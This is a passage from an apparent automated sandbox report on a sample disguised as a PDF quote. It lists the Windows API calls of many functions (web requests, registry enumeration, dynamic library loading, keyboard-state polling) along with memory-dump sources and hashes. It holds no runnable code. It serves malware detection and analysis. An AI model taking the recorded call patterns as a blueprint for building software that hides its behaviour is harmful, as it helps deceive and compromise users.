                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EB91E9
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EB9219
                                                                      • Part of subcall function 00E67D2C: _memmove.LIBCMT ref: 00E67D66
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 365058703-1403004172
                                                                    • Opcode ID: 22b8446b0ee085866ce6cb9b5f3bd10a92dd0551c6428e12c48d2ac39fcaa104
                                                                    • Instruction ID: 186358f3e33e887c6b4238be6d2b957ac392ec9c7e2a6e19b11a0d4c8e7fda80
                                                                    • Opcode Fuzzy Hash: 22b8446b0ee085866ce6cb9b5f3bd10a92dd0551c6428e12c48d2ac39fcaa104
                                                                    • Instruction Fuzzy Hash: 1E212231A40108BFCB14ABA4EC85CFFB7B8DF45360F105129F629B72F2CB34494A9620
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ED1962
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00ED1988
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00ED19B8
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00ED19FF
                                                                      • Part of subcall function 00ED2599: GetLastError.KERNEL32(?,?,00ED192D,00000000,00000000,00000001), ref: 00ED25AE
                                                                      • Part of subcall function 00ED2599: SetEvent.KERNEL32(?,?,00ED192D,00000000,00000000,00000001), ref: 00ED25C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 3113390036-3916222277
                                                                    • Opcode ID: 9644151f08c28025241ced93b3bbc59bfb89151b6daaee97e834c7ade0559162
                                                                    • Instruction ID: 618489940c066b6ff33f7e73214237dc70323c1dc343d84cd6c511daa64d9d92
                                                                    • Opcode Fuzzy Hash: 9644151f08c28025241ced93b3bbc59bfb89151b6daaee97e834c7ade0559162
                                                                    • Instruction Fuzzy Hash: D0218EB2604208BFEB119B60DCA5EBF76ECEB88748F10515BF505B6240EA349E0697A1
                                                                    APIs
                                                                      • Part of subcall function 00E61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E61D73
                                                                      • Part of subcall function 00E61D35: GetStockObject.GDI32(00000011), ref: 00E61D87
                                                                      • Part of subcall function 00E61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E61D91
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EE6493
                                                                    • LoadLibraryW.KERNEL32(?), ref: 00EE649A
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EE64AF
                                                                    • DestroyWindow.USER32(?), ref: 00EE64B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 4146253029-1011021900
                                                                    • Opcode ID: 2d900e9b9b42441b37eeb888118d78462304e2f427bf35f68e1496539c07ee95
                                                                    • Instruction ID: 2f190b68bef6c218ad46ebc4a02956efe43f9099c6bf561d9032b5cedaec36be
                                                                    • Opcode Fuzzy Hash: 2d900e9b9b42441b37eeb888118d78462304e2f427bf35f68e1496539c07ee95
                                                                    • Instruction Fuzzy Hash: 9821C27160024DAFEF104E66DC80EBB37A9FF693A8F10A618F920A61D0D731CC419760
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00EC6E65
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EC6E98
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00EC6EAA
                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00EC6EE4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: 95aceda6639b3dbc792976c5537a1c75af3b616f05c2337ec7233d5c637f1c72
                                                                    • Instruction ID: 9b0b0262f7818459d581d72aa018003342f11cdcc2fdecc47bb20b33b171ab95
                                                                    • Opcode Fuzzy Hash: 95aceda6639b3dbc792976c5537a1c75af3b616f05c2337ec7233d5c637f1c72
                                                                    • Instruction Fuzzy Hash: 96218078500209AFDB209F29D944F9B7BB4AF44724F20561EFCA0EB2D0D77299528B50
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00EC6F32
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EC6F64
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00EC6F75
                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00EC6FAF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: 7df75b98edaeaa049ea8e4ffc2f955dcf966d8e3c13fa4f6ea8de5a61b880bf8
                                                                    • Instruction ID: db065d64ef1f14805bdccd770d8d90a73c045d97f23e6abc403633eda81e52a3
                                                                    • Opcode Fuzzy Hash: 7df75b98edaeaa049ea8e4ffc2f955dcf966d8e3c13fa4f6ea8de5a61b880bf8
                                                                    • Instruction Fuzzy Hash: 2A21E031600349ABCB209F29AE44FAB77E8AF44324F201A5DFDA0F72D0D77298428B10
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00ECACDE
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00ECAD32
                                                                    • __swprintf.LIBCMT ref: 00ECAD4B
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00EEF910), ref: 00ECAD89
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                    • String ID: %lu
                                                                    • API String ID: 3164766367-685833217
                                                                    • Opcode ID: 1f7555871ffe5e9db66738cb0c1f8dbaa96ee34345f29bd494632fbc5b88c008
                                                                    • Instruction ID: 5b362d5415177fd19021730a79b96e1e8cdb41954a54dc98881d7d4abeabf113
                                                                    • Opcode Fuzzy Hash: 1f7555871ffe5e9db66738cb0c1f8dbaa96ee34345f29bd494632fbc5b88c008
                                                                    • Instruction Fuzzy Hash: 1A217430A0024DAFCB10DF65D985EEE7BF8EF89704B044069F509BB252DB31EA45CB61
                                                                    APIs
                                                                      • Part of subcall function 00E67D2C: _memmove.LIBCMT ref: 00E67D66
                                                                      • Part of subcall function 00EBA15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EBA179
                                                                      • Part of subcall function 00EBA15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EBA18C
                                                                      • Part of subcall function 00EBA15C: GetCurrentThreadId.KERNEL32 ref: 00EBA193
                                                                      • Part of subcall function 00EBA15C: AttachThreadInput.USER32(00000000), ref: 00EBA19A
                                                                    • GetFocus.USER32 ref: 00EBA334
                                                                      • Part of subcall function 00EBA1A5: GetParent.USER32(?), ref: 00EBA1B3
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00EBA37D
                                                                    • EnumChildWindows.USER32(?,00EBA3F5), ref: 00EBA3A5
                                                                    • __swprintf.LIBCMT ref: 00EBA3BF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                    • String ID: %s%d
                                                                    • API String ID: 1941087503-1110647743
                                                                    • Opcode ID: 0e81ab89a61083b94c54019a127c6822f516c46859cc9354fa764f1241f5b116
                                                                    • Instruction ID: f05be41b1926b6ebef818893610bb46203e4a3171ab0512f504833a65f454ba5
                                                                    • Opcode Fuzzy Hash: 0e81ab89a61083b94c54019a127c6822f516c46859cc9354fa764f1241f5b116
                                                                    • Instruction Fuzzy Hash: 5711ACB16002096BDF11BF64EC86FEE37B8AF49700F045075FA5CBA192CA719A458B72
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EDED1B
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EDED4B
                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EDEE7E
                                                                    • CloseHandle.KERNEL32(?), ref: 00EDEEFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                    • String ID:
                                                                    • API String ID: 2364364464-0
                                                                    • Opcode ID: 87f0f643b506e57b1389e50bad08ecf5ff409e9535cb763deda82fb105f8bb95
                                                                    • Instruction ID: 7dcdf6483e5ea3cbabff6b7a54bf99c28c38c559371a740e17641dceaef84176
                                                                    • Opcode Fuzzy Hash: 87f0f643b506e57b1389e50bad08ecf5ff409e9535cb763deda82fb105f8bb95
                                                                    • Instruction Fuzzy Hash: 8C8171716403009FD720EF28DC86F6AB7E5EF88750F14991DF999EB392DA71AC018B51
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 1559183368-0
                                                                    • Opcode ID: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                                    • Instruction ID: 7dc57cbec755c9c609fd78132467a389c7eb0554a53bdaf92fb9858cc2d80c74
                                                                    • Opcode Fuzzy Hash: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                                    • Instruction Fuzzy Hash: 5B51B732A00B05DBDF24AF69C8805AE77A6EF40324F64972EF82DB62D0DF719D509B41
                                                                    APIs
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                      • Part of subcall function 00EE0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EDFE38,?,?), ref: 00EE0EBC
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EE0188
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EE01C7
                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EE020E
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00EE023A
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EE0247
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                    • String ID:
                                                                    • API String ID: 3440857362-0
                                                                    • Opcode ID: d22520d3d60d2cb1a9fa1a917c16c556cd9da762795f2ebd6f036d507b133f48
                                                                    • Instruction ID: 400b3800f76e97854ed96813b2a225654507912bd56e8388b665d4d8a5759e63
                                                                    • Opcode Fuzzy Hash: d22520d3d60d2cb1a9fa1a917c16c556cd9da762795f2ebd6f036d507b133f48
                                                                    • Instruction Fuzzy Hash: F2517E31208244AFD704EF95DC85E6EB7E8FF88344F04592DF595AB2A2DB70E944CB52
                                                                    APIs
                                                                      • Part of subcall function 00E69997: __itow.LIBCMT ref: 00E699C2
                                                                      • Part of subcall function 00E69997: __swprintf.LIBCMT ref: 00E69A0C
                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EDDA3B
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EDDABE
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EDDADA
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EDDB1B
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EDDB35
                                                                      • Part of subcall function 00E65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EC793F,?,?,00000000), ref: 00E65B8C
                                                                      • Part of subcall function 00E65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EC793F,?,?,00000000,?,?), ref: 00E65BB0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 327935632-0
                                                                    • Opcode ID: 90ec985c77429dc8d8bbf2fdcfecd93cf2fc6f22b943de5cfda8c67b72493f7b
                                                                    • Instruction ID: 10fb2b57624819dedd0b1b782fb5068ad67d943d2b1c580372b0c8f141b50014
                                                                    • Opcode Fuzzy Hash: 90ec985c77429dc8d8bbf2fdcfecd93cf2fc6f22b943de5cfda8c67b72493f7b
                                                                    • Instruction Fuzzy Hash: A8510635A44609DFCB01EFA8D8849ADF7F4EF58314B15D06AE819AB312DB30AD46CB91
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00ECE6AB
                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00ECE6D4
                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00ECE713
                                                                      • Part of subcall function 00E69997: __itow.LIBCMT ref: 00E699C2
                                                                      • Part of subcall function 00E69997: __swprintf.LIBCMT ref: 00E69A0C
                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00ECE738
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00ECE740
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1389676194-0
                                                                    • Opcode ID: 55581937c025707a28f62c6dc0f3217d6b1ab30a1356e14e758f4bf161236962
                                                                    • Instruction ID: 41b718d06447b5b64c537be016aee3f3125388a45e5e0329ec676a9e96550a40
                                                                    • Opcode Fuzzy Hash: 55581937c025707a28f62c6dc0f3217d6b1ab30a1356e14e758f4bf161236962
                                                                    • Instruction Fuzzy Hash: D3513B35A40205DFCF05EF64D981AADBBF5EF48314B189099E949BB362CB31ED11CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 868b6181c189cd25615fed80a814ac28db12ea44283df1f6661c7fd27409dc77
                                                                    • Instruction ID: f2e04bd113179caaf4928f34200fabc69ed857129350d6b67eccbfd3fd5999cf
                                                                    • Opcode Fuzzy Hash: 868b6181c189cd25615fed80a814ac28db12ea44283df1f6661c7fd27409dc77
                                                                    • Instruction Fuzzy Hash: 6E41E2B590229CAFC720DF29CC44FA9BBA5AB09364F191179F815B72E1C730AD05DA51
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00E62357
                                                                    • ScreenToClient.USER32(00F257B0,?), ref: 00E62374
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00E62399
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00E623A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID:
                                                                    • API String ID: 4210589936-0
                                                                    • Opcode ID: ff60d8f97123b8760beb41aeedb5f14e79e71941983c5d2f809ff4c668939b2e
                                                                    • Instruction ID: 7a3c8ed85f240d3bf8950a5ac61040df7edf11a07964fa5e9f74bdf3ba33d351
                                                                    • Opcode Fuzzy Hash: ff60d8f97123b8760beb41aeedb5f14e79e71941983c5d2f809ff4c668939b2e
                                                                    • Instruction Fuzzy Hash: D041DF3590410AFFCF159F69C844AEDBBB4FB153A4F20536AF828B6291C7306994DF90
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB673D
                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00EB6789
                                                                    • TranslateMessage.USER32(?), ref: 00EB67B2
                                                                    • DispatchMessageW.USER32(?), ref: 00EB67BC
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB67CB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                    • String ID:
                                                                    • API String ID: 2108273632-0
                                                                    • Opcode ID: 39753e7a4d915944d6493412a0276c54cea1f5448f432838f14f607300ed2e13
                                                                    • Instruction ID: 825d6105dca24762046e617e6ba4889ec72b5d2cc9850af68b2b3ef08bd35761
                                                                    • Opcode Fuzzy Hash: 39753e7a4d915944d6493412a0276c54cea1f5448f432838f14f607300ed2e13
                                                                    • Instruction Fuzzy Hash: 0831C83190156AAFDB248FB49C48FF77BECAB01708F141166E421E61A1EB79944ADBA0
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00EB8CF2
                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00EB8D9C
